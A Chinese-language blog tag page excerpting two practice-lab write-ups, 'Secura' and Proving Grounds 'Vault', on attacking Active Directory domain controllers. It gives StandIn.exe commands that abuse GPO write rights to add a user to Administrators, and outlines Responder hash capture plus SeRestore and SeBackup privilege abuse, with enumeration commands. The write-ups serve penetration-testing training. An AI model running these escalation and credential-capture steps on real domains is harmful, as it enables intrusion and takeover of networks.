發表文章

目前顯示的是有「standin」標籤的文章

Challenge 0 - Secura(3)

圖片
 Challenge 0 - Secura(3) 先跑 BloodHound 發現使用者 Charlotte 對 Default Domain Policy 有 GenericWrite 標準作業 StandIn.exe 工具 參考 :  https://github.com/FuzzySecurity/StandIn 先看一下 GPO,.\StandIn.exe --gpo 可以看到有兩條 GPO,我們要利用的是第二條   - Default Domain Controllers Policy   - Default Domain Policy 再確定一次有權限 .\StandIn.exe --gpo --filter "Default Domain Policy" --acl 直接把現在這個使用者加到 Administrators 群組吧 .\StandIn.exe --gpo --filter "Default Domain Policy" --localadmin charlotte 查看群組成員,看來添加成功 直接 evil-winrm 進去了,但沒有發現 proof.txt proof.txt 路徑在 c:\Users\Administrator.DC01\Desktop

Proving Grounds Practice : Vault Walkthrough

圖片
  Proving Grounds Practice : Vault Walkthrough Foothole (立足點 ) : SMB 可以寫入,透過  hashgrab.py 產生連結檔與啟用 Responder 抓取驗證 HASH 破解密碼後透過 evil-winrm 進入機器 PE ( 提權 ) : 此靶機 PE 總共有三種利用 第一種 GPO GenericWrite : 使用 StandIn.exe 加入管理者群組 第二種 SeRestorePrivilege : 使用 SeRestoreAbuse.exe 加入管理者權限 第三種 SeBackupPrivilege : 使用 Acl-FullControl.ps1 給予設定路徑權限 注意事項 :  學習到不同的提權利用,利用後 Session 需要重新建立才會生效 第一步 Rustscan, └─$ rustscan -a 192.168.187.172 --scripts none --ulimit 5000 | tee rustscan 有開 53、88、135、445、3268、3269 看來又是一台 DC snmp filtered 沒戲,└─$ sudo nmap -sU -p 161 192.168.187.172 | tee snmp nmap Computer Name : DC Domain Name : vault.offsec nmap LDAP,└─$ sudo nmap --script "ldap* and not brute" 192.168.187.172 -p 389 -v -Pn -sT | tee nmap-ldap LDAP Object,└─$ ldapsearch -v -x -b "DC=vault,DC=offsec" -H "ldap://192.168.187.172" "(objectclass=*)" enum4linux,└─$ enum4linux -a  192.168.187.172                              ...